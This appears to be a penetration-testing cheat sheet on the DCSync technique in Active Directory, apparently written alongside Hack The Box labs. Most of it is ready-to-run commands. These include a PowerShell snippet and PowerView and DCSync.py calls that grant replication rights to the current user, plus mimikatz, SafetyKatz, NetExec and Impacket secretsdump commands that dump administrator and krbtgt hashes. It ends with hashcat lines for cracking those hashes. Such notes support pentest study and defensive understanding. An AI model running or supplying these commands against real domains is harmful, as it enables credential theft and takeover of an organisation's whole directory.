DCSync

In Active Directory environments, multiple Domain Controllers (DCs) replicate data using the Directory Replication Service Remote Protocol (DRSR). The DCSync technique abuses this by impersonating a DC and requesting user credential data—essentially pulling ntds.dit contents over the network without code execution on a real DC. Critically, DCs do not authenticate the source of the replication request, only that the caller’s SID has the necessary replication privileges.

To perform DCSync, an attacker must control an account with the following rights: Replicating Directory Changes, Replicating Directory Changes All, and sometimes Replication-Get-Changes-In-Filtered-Set. These are assigned by default to Domain Admins, Enterprise Admins, and built-in Administrators.

However, if you have WriteDACL over a privileged account, you can delegate these rights yourself. Notably, the Exchange Windows Permissions group often has DCSync rights in enterprise environments. For an example of levearing WriteDACL to perform DCSync see Forest.

Tools

Windows

We can enumerate permissions using an elevated CMD or PS session.

# Command Prompt
dsacls "DC=domain,DC=local"
# PowerShell
Get-DomainObjectAcl -Identity <USER> -Domain domain.local -ResolveGUIDs

We can assign DCSync rights manually or automatically using PowerView or DCSync.py.

The manual way is explained here.

# Manually
$acl = get-acl "ad:DC=domain,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# rightsGuid for the extended right Ds-Replication-Get-Changes
$objectguid = new-object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-acl -aclobject $acl "ad:DC=domain,DC=local"

# PowerView
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <USER> -Rights DCSync

Once the rights have been assigned, we can perform the attack with mimikatz.

# Mimikatz (PS script)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"'
# Mimikatz (binary)
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator

Finally, we can crack the hash using hashcat on our attacking machine.

hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule --force

Linux

We can assign DCSync rights using DCSync.py.

# DCSync.py
DCSync.py -dc domain.local -t 'CN=<USER>,CN=Users,DC=domain,DC=local' 'domain.local\<USER>:<PASS>'

We can also perform the attack with NetExec or Impacket's secretsdump script.

# NetExec
nxc smb 10.10.10.161 -u '<USER>' -p '<PASS>' --ntds --user administrator

# Impacket's secretsdump
impacket-secretsdump htb.local/hacker@10.10.10.161 -just-dc-user administrator

For an example of a DCSync attack using DCSync.py and secretsdump.py see here. For an example of a DCSync attack using NetExec see here.

Finally, we can crack the hash using hashcat on our attacking machine.

hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule --force

SafetyKatz

SafetyKatz can be used to perform a DCSync attack:

.\SafetyKatz.exe "privilege::debug" "lsadump::dcsync /user:dcorp\ktbtgt" "exit"

Resources

• An in-depth article about DCSync from Altered Security (article)

• What impacket-secretsdump does behind the scenes (video)